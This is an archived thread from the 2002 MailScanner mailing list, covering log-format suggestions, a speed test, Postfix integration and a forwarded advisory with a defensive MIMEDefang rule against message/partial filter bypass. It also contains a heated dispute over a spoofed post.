<5.1.0.14.2.20020912112455.035b8978@imap.ecs.soton.ac.uk> <20020912133824.53e6baff.marc.perea@electronic-group.com> Message-ID: <3D80C347.6050205@pa.net> Marc Perea wrote: > On Thu, 12 Sep 2002 11:25:51 +0100 > Julian Field wrote: > > >>It is one of the things on the list. Unfortunately Nick is pretty busy >>at the moment having recently moved from the UK to NZ. Once he gets some >>more time... > > > Not any aproximated date ... ? Just to know if I can wait for it. > > It's important for me to know it because I'm very happy with MailScanner > and I don't want to move away from it. > We have MailScanner and postfix working together quite happily, with minimal mods to the MailScanner code and postfix config. It only requires two additional programs to handle the interface between the two. Both are small perl programs that should be easily ported to C, if performance is an issue. We're working on a new version that will require no MailScanner code tweaks at all. Leland Steinke Network Engineer CTI/PAdotNET From LISTSERV at JISCMAIL.AC.UK Thu Sep 12 16:46:19 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:36 2006 Subject: MAILSCANNER: mdm@INTERNET-TOOLS.COM left the list Message-ID: <200209121546.QAA17503@magpie.ecs.soton.ac.uk> Thu, 12 Sep 2002 16:46:19 mark david mcCreary has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Thu, 12 Sep 2002 16:46:16 +0100 Received: from popmail.internet-tools.com (popmail.internet-tools.com [63.214.251.4]) by ori.rl.ac.uk (8.11.1/8.11.1) with SMTP id g8CFkCr03820 for ; Thu, 12 Sep 2002 16:46:12 +0100 Received: (qmail 2133 invoked from network); 12 Sep 2002 10:00:00 -0000 Received: from turbo.internet-tools.com (HELO ?63.214.251.9?) (63.214.251.9) by popmail.internet-tools.com with SMTP; 12 Sep 2002 10:00:00 -0000 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Sender: m0010@popmail.internet-tools.com Message-Id: Date: Thu, 12 Sep 2002 10:42:44 -0500 To: LISTSERV@JISCMAIL.AC.UK From: mark david mcCreary From mailscanner at ecs.soton.ac.uk Thu Sep 12 18:02:24 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:36 2006 Subject: [Fwd: MIMEDefang update (was Re: Bypassing SMTP Content Protection )] In-Reply-To: <1031845174.27821.12.camel@johnny5> Message-ID: <5.1.0.14.2.20020912180011.04fa8bc0@imap.ecs.soton.ac.uk> Well spotted! I don't get time to catch up with Bugtraq as often as I would like to. I have put in the support for this in the new release. I need to test it to see if MIME-tools does enough to even let me test for it, or whether I am going to have to wait for the MIME-tools patch as well. If you see anything else to do with this subject on Bugtraq, especially about the MIME-tools patch, I would be very grateful if you could let me know. I need to test the V4 code before I decide whether it is worth back-porting it into V3. At 16:39 12/09/2002, you wrote: >and this is relevant too, I believe. >-- >Tal Kelrich > >PGP Fingerprint: 3EDF FCC5 60BB 4729 AB2F CAE6 FEC1 9AAC 12B9 AA69 >PGP key-id: 12B9AA69 >Return-Path: >Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com > [66.38.151.27]) by mail.musicgenome.com (8.11.6/8.11.6) with ESMTP id > g8CEkPN19567 for ; Thu, 12 Sep 2002 17:46:26 > +0300 >Received: from lists.securityfocus.com (lists.securityfocus.com > [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with QMQP id > 80837A3141; Thu, 12 Sep 2002 09:14:33 -0600 (MDT) >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Received: (qmail 11003 invoked from network); 12 Sep 2002 14:54:04 -0000 >Date: Thu, 12 Sep 2002 11:11:07 -0400 (EDT) >From: "David F. Skoll" >To: bugtraq@securityfocus.com >Subject: MIMEDefang update (was Re: Bypassing SMTP Content Protection ) >In-Reply-To: <004801c25a62$9a9b5080$0c01a8c0@beyondmobile1> >Message-ID: > >MIME-Version: 1.0 >Content-Type: TEXT/PLAIN; charset=US-ASCII >X-MailScanner: Found to be clean >X-MailScanner-SpamCheck: not spam, SpamAssassin (score=-3.4, required 7, > IN_REP_TO) >X-UIDL: @U!"!~jh!!CLc!!m/i"! >Status: U > >MIMEDefang (http://www.roaringpenguin.com/mimedefang/) is an SMTP >filtering tool which in its default configuration is susceptible >to this attack. > >MIMEDefang relies on the MIME::tools Perl parsing module. This module >correctly descends into "message/rfc822" entities and parses parts >inside them, but it does not descend into "message/partial" entities. >Therefore, even the default filename checks will not work with >"message/partial" types. I hope to have a patched version of MIME::tools >soon. > >For the next MIMEDefang release, the default filter will be modified to drop >message/partial parts. Current users of MIMEDefang should add the >following code to their filter and filter_multipart routines: > ># Block message/partial parts >if (lc($type) eq "message/partial") { > action_quarantine_entire_message(); > action_notify_administrator("Message quarantined because of > message/partial type"); > return action_discard(); >} > >-- >David. > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From gerry at dorfam.ca Thu Sep 12 18:18:16 2002 From: gerry at dorfam.ca (Gerry Doris) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekago.try reading it In-Reply-To: References: Message-ID: <1734.64.10.121.84.1031851096.squirrel@tiger.dorfam.ca> I did NOT send this note! This was sent from someone at datawatch.com. It did absolutely NOT come from me. I can guess who at datawatch.com sent it. Why in hell do we put up with this idiot??????????????? Gerry Doris > MessageI agree with Matt! > I want to know if I'm being heard as well! > > Matt Doherty > IT Dept > Datawatch Corp > >>>In a world without walls or fences, who needs Windows and Gates?<< > > -----Original Message----- > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > Sent: Thursday, September 12, 2002 12:04 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: what are you rude?.. heres a copy of what I sent you a > weekago.try reading it > > > Yeah, So do I. > I think the people of this list deserve to know what he added from > their > suggestions. Don't you think? If your standing in line to get in a > concert, arn't you wondering if your going to get in - in time to not > miss the beginning of a show. > Dont talk to me about money - I have done over 170,000 dollars of > work > for nothing over 5 years and I am still polite to the people I do it > for. That doesn't matter anyways. I asked a question politely towards > this list probably 17 times and only got 15 of them answered.. Meanwhile > off the subject questions get answered. > But I'm not rude about it either. I think the people in this list > deserve > a better respons than that. I think we all wanted to know what he > considered and what he didn't. Otherwise we may think twice about > answering him next time. I spent 10 minutes trying to think of some good > suggestions only to get a response stating "SUch As"? > I STATED 2 SUCH AS examples. That shows me how carefully read these > posts > are in here. The public helped get this program where it is today. Dont > get an ego over it. > > Matt Doherty > IT Dept > Datawatch Corp > > >>In a world without walls or fences, who needs Windows and Gates?<< > > -----Original Message----- > From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] > Sent: Thursday, September 12, 2002 11:50 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: what are you rude?.. heres a copy of what I sent you a > week > ago.try reading it > > > Normally I leave arrogant posts like this alone, because I find it's > a > waste of time to teach people manners in a forum like this. But . . . > > If you want someone to complain to, yell at, rip apart, be rude to, > etc > I've included a list of commercial anti-virus companies that will gladly > put up with that for a few thousand+ dollars. > > http://www.nai.com/ > http://www.trendmicro.com/ > http://www.sophos.com/ > > Meanwhile if you plan on staying on this list, most of us don't like > to > see Julian assaulted with attitudes like this. He's saving me in the > neighborhood of $20,000, and that's not even counting the reduced labor > I have to spend on his product compared to the big boy's products, and I > come from a small shop. I can't imagine what he's saving other people > in money. And here's the kicker, he works for FREE. > > > Steve Evans > (619) 594-0653 > > -----Original Message----- > From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] > Sent: Thursday, September 12, 2002 7:40 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: what are you rude?.. heres a copy of what I sent you a > week > ago. try reading it > > > such as > > > Matt Doherty > IT Dept > Datawatch Corp > > >>In a world without walls or fences, who needs Windows and > Gates?<< > > -----Original Message----- > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > Sent: Monday, September 09, 2002 4:34 PM > To: MailScanner mailing list > Subject: RE: New release logging suggestions > > > I would like to see some differant text in the log per email virus > caught.. I grep the maillog to see how many viruses caught so far that > week. For instance, I currently tried 'tail -2000 /var/log/maillog | > grep >>>>Virus' of course the ">" symbols something that messes grep up and >>>> wont > work. The only string that works best is just use the word Virus ( tail > -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the > mailscanner restarting every four hours lines as well as the viruses > caught. I cant think of anything good but maybe some weird character > that is never seen in the maillog such as a & or pipe symbol? Just > something that grep could sniff out easily ONLY for caught viruses. Or > do you have a better solution? The Email ID to go along with it as well > would be nice. for ones that were scanned and ones that were found to be > infected. > Hope that is a ok suggestion.. > Oh well Im still a newbie anyways 8-) > > Matt Doherty > IT Dept > Datawatch Corp > > >>In a world without walls or fences, who needs Windows and > Gates?<< > > -----Original Message----- > From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Sent: Monday, September 09, 2002 5:14 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: New release logging suggestions > > > The new release is getting there... > > What logging would people like to see? > Anything particular that you want logged? > > Suggestions please. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. > 023 8059 2817 University of Southampton > Southampton SO17 1BJ Gerry From jim at ENTROPHY-FREE.NET Thu Sep 12 18:15:55 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:36 2006 Subject: First speed test of version 4 In-Reply-To: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912145532.04ba5368@imap.ecs.soton.ac.uk> Message-ID: <1031850955.20136.1.camel@chaos.entrophy-free.net> On Thu, 2002-09-12 at 09:02, Julian Field wrote: > This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. > It's not very fast by modern standards but was quite nice when I bought it > a few years ago... > > Version 3 processed 20,000 messages in 415.5 minutes. > This scales up to 69314 messages per day. > > Version 4 processes 20,000 messages in 130.3 minutes. > This scales up to 221028 messages per day. > > So version 4 ran 3.2 times faster than version 3 on the same hardware, with > the same MailScanner configuration, with the same 20,000 messages. > Now that's impressive. Based on that, perhaps a name change to MailZinger or MailScreamer wouldn't be unreasonable. -- The instructions said to use Windows 98 or better, so I installed RedHat. From tal at MUSICGENOME.COM Thu Sep 12 18:23:04 2002 From: tal at MUSICGENOME.COM (Tal Kelrich) Date: Thu Jan 12 21:15:36 2006 Subject: [Fwd: Roaring Penguin fixes for "Bypassing SMTP Content Protection with a Flick of a Button"] Message-ID: <1031851387.27821.20.camel@johnny5> Skipped content of type multipart/mixed-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: This is a digitally signed message part Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/fabec1ba/attachment.bin From lbergman at abi.tconline.net Thu Sep 12 18:26:03 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a week ago. try reading it In-Reply-To: References: Message-ID: <200209121226.03649.lbergman@abi.tconline.net> I hope you never request anything I want. -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From hamish at TRAVELLINGKIWI.COM Thu Sep 12 18:32:50 2002 From: hamish at TRAVELLINGKIWI.COM (Hamish Marson) Date: Thu Jan 12 21:15:36 2006 Subject: logging References: <5.1.0.14.2.20020912142901.04f33838@imap.ecs.soton.ac.uk> Message-ID: <3D80CFC2.20800@travellingkiwi.com> Julian Field wrote: > Ok, here are all the responses: > > *1. From <$1> To <$2> virus <$3> > > *Impossible to generically extract the name of the virus, so this > would have to include the whole virus report. Why do you say this? I run amavisd-new (Because I run postfix), and it manages to extract the name of (ALL) the virii caught in a mail message. And logs them. Admittedly it's separate code for each virus engine. But then it's separate code to call them anyway, because they're all differemt... e.g. for NAI # # McAfee # if ($uvscan ne "") { $output = `$uvscan $uvscan_args $TEMPDIR/parts`; $errval = ($? >> 8); do_log(2,$output); if ($errval != 0) { if ($errval == $uvscan_exitcode) { my $loutput = $output; $loutput =~ s/Found: (.+) NOT a/Found the $1/g; $loutput =~ s/Found the (.+) trojan/Found the $1 virus/g; $loutput =~ s/Found virus or variant (.+) /Found the $1 virus/g; @virusname = ($loutput =~ /Found the (.+) virus/g); do_virus($output); } else { do_log(0,"Virus scanner failure: $uvscan (error code: $errval)"); } } } And @virusname holds the names of all the virii caught... -- I don't suffer from Insanity... | Linux User #16396 I enjoy every minute of it... | | http://www.travellingkiwi.com/ | From ucs_rat at SHSU.EDU Thu Sep 12 17:43:11 2002 From: ucs_rat at SHSU.EDU (Robert A. Thompson) Date: Thu Jan 12 21:15:36 2006 Subject: logging In-Reply-To: <3D80CFC2.20800@travellingkiwi.com> References: <5.1.0.14.2.20020912142901.04f33838@imap.ecs.soton.ac.uk> <3D80CFC2.20800@travellingkiwi.com> Message-ID: <1031848991.15297.36.camel@localhost.localdomain> This will work, however when I did this in amavis (before switching to mailscanner) I found it was not 100% accurate. Which is what I think Julian ment. This would get lots of them, however mcafee gets a wild hair sometimes and words things different on some viruses(this is often the case on Trojans, and new viruses where you use the extra.dat file till they release the official dat file). However, I would be willing to accept this method and deal with the few inaccuracies, and I would be happy with the "Found the yaha virus" messages for the report line also. Using a lot of unix tools (grep, awk, sort, uniq) I can still print very usable results for turning into other agencies on what we are seeing from either method. --Robert On Thu, 2002-09-12 at 12:32, Hamish Marson wrote: > Julian Field wrote: > > > Ok, here are all the responses: > > > > *1. From <$1> To <$2> virus <$3> > > > > *Impossible to generically extract the name of the virus, so this > > would have to include the whole virus report. > > > Why do you say this? I run amavisd-new (Because I run postfix), and it > manages to extract the name of (ALL) the virii caught in a mail message. > And logs them. > > Admittedly it's separate code for each virus engine. But then it's > separate code to call them anyway, because they're all differemt... > > > e.g. for NAI > > # > # McAfee > # > > if ($uvscan ne "") { > $output = `$uvscan $uvscan_args $TEMPDIR/parts`; > $errval = ($? >> 8); > do_log(2,$output); > if ($errval != 0) { > if ($errval == $uvscan_exitcode) { > my $loutput = $output; > $loutput =~ s/Found: (.+) NOT a/Found the $1/g; > $loutput =~ s/Found the (.+) trojan/Found the $1 > virus/g; > $loutput =~ s/Found virus or variant (.+) /Found > the $1 virus/g; > @virusname = ($loutput =~ /Found the (.+) virus/g); > do_virus($output); > } else { > do_log(0,"Virus scanner failure: $uvscan (error > code: $errval)"); > } > } > } > > > > And @virusname holds the names of all the virii caught... > > > -- > > I don't suffer from Insanity... | Linux User #16396 > I enjoy every minute of it... | > | > http://www.travellingkiwi.com/ | From sevans at FOUNDATION.SDSU.EDU Thu Sep 12 18:43:32 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekag o.try reading it Message-ID: <6214C3F9233D764C9E7029396C35501533149D@mail.foundation.sdsu.edu> Not to mention that commit is followed by Matt Doherty's standard signature. Steve Evans (619) 594-0653 -----Original Message----- From: Richard, Matt [mailto:matthew.richard@COCC.COM] Sent: Thursday, September 12, 2002 10:38 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a weekag o.try reading it Gerry is right, upon looking at the headers the message that says "I agree with Matt! I want to know if I'm being heard as well!" has the same headers as the others received from Datawatch. Received: from mails.datawatch.com ([207.60.138.157]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8CFr1r07562 for ; Thu, 12 Sep 2002 16:53:01 +0100 Received: from zainy (zainy.datawatch.com [172.22.51.130]) by mails.datawatch.com (8.11.6/8.11.6) with SMTP id g8CFpad29427 for ; Thu, 12 Sep 2002 11:51:36 -0400 Received: from mails.datawatch.com ([207.60.138.157]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8CFtYr08077 for ; Thu, 12 Sep 2002 16:55:34 +0100 Received: from zainy (zainy.datawatch.com [172.22.51.130]) by mails.datawatch.com (8.11.6/8.11.6) with SMTP id g8CFs8d29560 for ; Thu, 12 Sep 2002 11:54:08 -0400 -----Original Message----- From: Gerry Doris [mailto:gerry@DORFAM.CA] Sent: Thursday, September 12, 2002 1:18 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: what are you rude?.. heres a copy of what I sent you a weekago.try reading it I did NOT send this note! This was sent from someone at datawatch.com. It did absolutely NOT come from me. I can guess who at datawatch.com sent it. Why in hell do we put up with this idiot??????????????? Gerry Doris > MessageI agree with Matt! > I want to know if I'm being heard as well! > > Matt Doherty > IT Dept > Datawatch Corp > >>>In a world without walls or fences, who needs Windows and Gates?<< > > -----Original Message----- > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > Sent: Thursday, September 12, 2002 12:04 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: what are you rude?.. heres a copy of what I sent you a > weekago.try reading it > > > Yeah, So do I. > I think the people of this list deserve to know what he added from > their suggestions. Don't you think? If your standing in line to get in > a concert, arn't you wondering if your going to get in - in time to > not miss the beginning of a show. > Dont talk to me about money - I have done over 170,000 dollars of > work for nothing over 5 years and I am still polite to the people I do > it for. That doesn't matter anyways. I asked a question politely > towards this list probably 17 times and only got 15 of them answered.. > Meanwhile off the subject questions get answered. > But I'm not rude about it either. I think the people in this list > deserve > a better respons than that. I think we all wanted to know what he > considered and what he didn't. Otherwise we may think twice about > answering him next time. I spent 10 minutes trying to think of some good > suggestions only to get a response stating "SUch As"? > I STATED 2 SUCH AS examples. That shows me how carefully read these > posts > are in here. The public helped get this program where it is today. Dont > get an ego over it. > > Matt Doherty > IT Dept > Datawatch Corp > > >>In a world without walls or fences, who needs Windows and Gates?<< > > -----Original Message----- > From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] > Sent: Thursday, September 12, 2002 11:50 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: what are you rude?.. heres a copy of what I sent you > a week ago.try reading it > > > Normally I leave arrogant posts like this alone, because I find > it's a waste of time to teach people manners in a forum like this. But > . . . > > If you want someone to complain to, yell at, rip apart, be rude > to, etc I've included a list of commercial anti-virus companies that > will gladly put up with that for a few thousand+ dollars. > > http://www.nai.com/ > http://www.trendmicro.com/ > http://www.sophos.com/ > > Meanwhile if you plan on staying on this list, most of us don't > like to see Julian assaulted with attitudes like this. He's saving me > in the neighborhood of $20,000, and that's not even counting the > reduced labor I have to spend on his product compared to the big boy's > products, and I come from a small shop. I can't imagine what he's > saving other people in money. And here's the kicker, he works for > FREE. > > > Steve Evans > (619) 594-0653 > > -----Original Message----- > From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] > Sent: Thursday, September 12, 2002 7:40 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: what are you rude?.. heres a copy of what I sent you a > week ago. try reading it > > > such as > > > Matt Doherty > IT Dept > Datawatch Corp > > >>In a world without walls or fences, who needs Windows and > Gates?<< > > -----Original Message----- > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > Sent: Monday, September 09, 2002 4:34 PM > To: MailScanner mailing list > Subject: RE: New release logging suggestions > > > I would like to see some differant text in the log per email > virus caught.. I grep the maillog to see how many viruses caught so > far that week. For instance, I currently tried 'tail -2000 > /var/log/maillog | grep >>>>Virus' of course the ">" symbols something that messes grep up and >>>>wont > work. The only string that works best is just use the word Virus ( > tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the > mailscanner restarting every four hours lines as well as the viruses > caught. I cant think of anything good but maybe some weird character > that is never seen in the maillog such as a & or pipe symbol? Just > something that grep could sniff out easily ONLY for caught viruses. Or > do you have a better solution? The Email ID to go along with it as > well would be nice. for ones that were scanned and ones that were > found to be infected. > Hope that is a ok suggestion.. > Oh well Im still a newbie anyways 8-) > > Matt Doherty > IT Dept > Datawatch Corp > > >>In a world without walls or fences, who needs Windows and > Gates?<< > > -----Original Message----- > From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Sent: Monday, September 09, 2002 5:14 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: New release logging suggestions > > > The new release is getting there... > > What logging would people like to see? > Anything particular that you want logged? > > Suggestions please. > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ Gerry From matthew.richard at COCC.COM Thu Sep 12 18:48:06 2002 From: matthew.richard at COCC.COM (Richard, Matt) Date: Thu Jan 12 21:15:36 2006 Subject: logging Message-ID: Julian, I understand that #5 would result in a large amount of data being generated in log files however the problem that I am attempting to solve is that the mailarchive function uses a *huge* amount of space when enabled. In the end I am looking to generate per user, per domain and summary statistics from this type of log. I can see where the TO field may end up as a fairly long string. I understand if it seems impractical. Matthew Richard matthew.richard@cocc.com 860-678-0444x449 Connecticut Online Computer Center Avon, CT 06001 5. entries that could be used to create email usage reports. For each email to have To, From, Subject, Date, bytes, and names of any attachments would allow for easier creation of user reports. Is there a limit on the length of a log entry? These would be *very* long. -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Thursday, September 12, 2002 9:33 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: logging Ok, here are all the responses: 1. From <$1> To <$2> virus <$3> Impossible to generically extract the name of the virus, so this would have to include the whole virus report. 2. something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected Such as? 3. I would definately like the virus name reported by the virus engine See (1) 4. making the logging as machine freindly as possible I will do what I can. 5. entries that could be used to create email usage reports. For each email to have To, From, Subject, Date, bytes, and names of any attachments would allow for easier creation of user reports. Is there a limit on the length of a log entry? These would be *very* long. 6. Identifiable tag When you get a chance would you consider altering the logging code for matches on filename rules to have an identifiable tag. E.g. instead of logging: "Executable file in filename.exe" and "Possible MS-Dos shortcut attack in filename.pif" Log: "Filename Rules: Executable file in filename.exe" and "Filename rules: Possible MS-Dos shortcut attack in filename.pif" Definite good idea. Any more thoughts from anyone? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/4d144391/attachment.html From dbird at SGHMS.AC.UK Thu Sep 12 18:53:34 2002 From: dbird at SGHMS.AC.UK (Daniel Bird) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekago.try reading it References: <6214C3F9233D764C9E7029396C35501533149D@mail.foundation.sdsu.edu> Message-ID: <3D80D49E.48D3658A@sghms.ac.uk> I don't want to fuel the flames, but can 'we' not just get past this..... we're all grown up's after all Steve Evans wrote: > Not to mention that commit is followed by Matt Doherty's standard > signature. > > Steve Evans > (619) 594-0653 > > -----Original Message----- > From: Richard, Matt [mailto:matthew.richard@COCC.COM] > Sent: Thursday, September 12, 2002 10:38 AM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: what are you rude?.. heres a copy of what I sent you a > weekag o.try reading it > > Gerry is right, upon looking at the headers the message that says "I > agree with Matt! I want to know if I'm being heard as well!" has the > same headers as the others received from Datawatch. > > Received: from mails.datawatch.com ([207.60.138.157]) by ori.rl.ac.uk > (8.11.1/8.11.1) with ESMTP id g8CFr1r07562 for > ; Thu, 12 Sep 2002 16:53:01 +0100 > Received: from zainy (zainy.datawatch.com [172.22.51.130]) by > mails.datawatch.com (8.11.6/8.11.6) with SMTP id g8CFpad29427 > for > ; Thu, 12 Sep 2002 11:51:36 -0400 > > Received: from mails.datawatch.com ([207.60.138.157]) by ori.rl.ac.uk > (8.11.1/8.11.1) with ESMTP id g8CFtYr08077 for > ; Thu, 12 Sep 2002 16:55:34 +0100 > Received: from zainy (zainy.datawatch.com [172.22.51.130]) by > mails.datawatch.com (8.11.6/8.11.6) with SMTP id g8CFs8d29560 > for > ; Thu, 12 Sep 2002 11:54:08 -0400 > > -----Original Message----- > From: Gerry Doris [mailto:gerry@DORFAM.CA] > Sent: Thursday, September 12, 2002 1:18 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: what are you rude?.. heres a copy of what I sent you a > weekago.try reading it > > I did NOT send this note! > > This was sent from someone at datawatch.com. It did absolutely NOT come > from me. I can guess who at datawatch.com sent it. > > Why in hell do we put up with this idiot??????????????? > > Gerry > Doris > > > MessageI agree with Matt! > > I want to know if I'm being heard as well! > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > >>>In a world without walls or fences, who needs Windows and Gates?<< > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > Sent: Thursday, September 12, 2002 12:04 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: what are you rude?.. heres a copy of what I sent you a > > weekago.try reading it > > > > > > Yeah, So do I. > > I think the people of this list deserve to know what he added from > > their suggestions. Don't you think? If your standing in line to get in > > > a concert, arn't you wondering if your going to get in - in time to > > not miss the beginning of a show. > > Dont talk to me about money - I have done over 170,000 dollars of > > work for nothing over 5 years and I am still polite to the people I do > > > it for. That doesn't matter anyways. I asked a question politely > > towards this list probably 17 times and only got 15 of them answered.. > > > Meanwhile off the subject questions get answered. > > But I'm not rude about it either. I think the people in this list > > deserve > > a better respons than that. I think we all wanted to know what he > > considered and what he didn't. Otherwise we may think twice about > > answering him next time. I spent 10 minutes trying to think of some > good > > suggestions only to get a response stating "SUch As"? > > I STATED 2 SUCH AS examples. That shows me how carefully read these > > posts > > are in here. The public helped get this program where it is today. > Dont > > get an ego over it. > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and Gates?<< > > > > -----Original Message----- > > From: Steve Evans [mailto:sevans@FOUNDATION.SDSU.EDU] > > Sent: Thursday, September 12, 2002 11:50 AM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: what are you rude?.. heres a copy of what I sent you > > a week ago.try reading it > > > > > > Normally I leave arrogant posts like this alone, because I find > > it's a waste of time to teach people manners in a forum like this. But > > > . . . > > > > If you want someone to complain to, yell at, rip apart, be rude > > to, etc I've included a list of commercial anti-virus companies that > > will gladly put up with that for a few thousand+ dollars. > > > > http://www.nai.com/ > > http://www.trendmicro.com/ > > http://www.sophos.com/ > > > > Meanwhile if you plan on staying on this list, most of us don't > > like to see Julian assaulted with attitudes like this. He's saving me > > > in the neighborhood of $20,000, and that's not even counting the > > reduced labor I have to spend on his product compared to the big boy's > > > products, and I come from a small shop. I can't imagine what he's > > saving other people in money. And here's the kicker, he works for > > FREE. > > > > > > Steve Evans > > (619) 594-0653 > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@DATAWATCH.COM] > > Sent: Thursday, September 12, 2002 7:40 AM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: what are you rude?.. heres a copy of what I sent you a > > week ago. try reading it > > > > > > such as > > > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and > > Gates?<< > > > > -----Original Message----- > > From: Matt Doherty [mailto:Matthew_doherty@datawatch.com] > > Sent: Monday, September 09, 2002 4:34 PM > > To: MailScanner mailing list > > Subject: RE: New release logging suggestions > > > > > > I would like to see some differant text in the log per email > > virus caught.. I grep the maillog to see how many viruses caught so > > far that week. For instance, I currently tried 'tail -2000 > > /var/log/maillog | grep > >>>>Virus' of course the ">" symbols something that messes grep up and > >>>>wont > > work. The only string that works best is just use the word Virus ( > > tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the > > > mailscanner restarting every four hours lines as well as the viruses > > caught. I cant think of anything good but maybe some weird character > > that is never seen in the maillog such as a & or pipe symbol? Just > > something that grep could sniff out easily ONLY for caught viruses. Or > > > do you have a better solution? The Email ID to go along with it as > > well would be nice. for ones that were scanned and ones that were > > found to be infected. > > Hope that is a ok suggestion.. > > Oh well Im still a newbie anyways 8-) > > > > Matt Doherty > > IT Dept > > Datawatch Corp > > > > >>In a world without walls or fences, who needs Windows and > > Gates?<< > > > > -----Original Message----- > > From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Sent: Monday, September 09, 2002 5:14 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: New release logging suggestions > > > > > > The new release is getting there... > > > > What logging would people like to see? > > Anything particular that you want logged? > > > > Suggestions please. > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > Gerry > > -- > This message has been scanned for viruses and > dangerous content by MailScanner, and is > believed to be clean. -- ____________________________________ Daniel Bird Network and Systems Manager Department Of Information Services St. George's Hospital Medical School Tooting London SW17 0RE P: +44 20 8725 2897 F: +44 20 8725 3583 E: dan@sghms.ac.uk ____________________________________ Everything is possible....except skiing through a revolving door. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. From tal at MUSICGENOME.COM Thu Sep 12 19:10:59 2002 From: tal at MUSICGENOME.COM (Tal Kelrich) Date: Thu Jan 12 21:15:36 2006 Subject: what are you rude?.. heres a copy of what I sent you a weekago.try reading it In-Reply-To: <1734.64.10.121.84.1031851096.squirrel@tiger.dorfam.ca> References: <1734.64.10.121.84.1031851096.squirrel@tiger.dorfam.ca> Message-ID: <1031854260.11713.2.camel@johnny5> 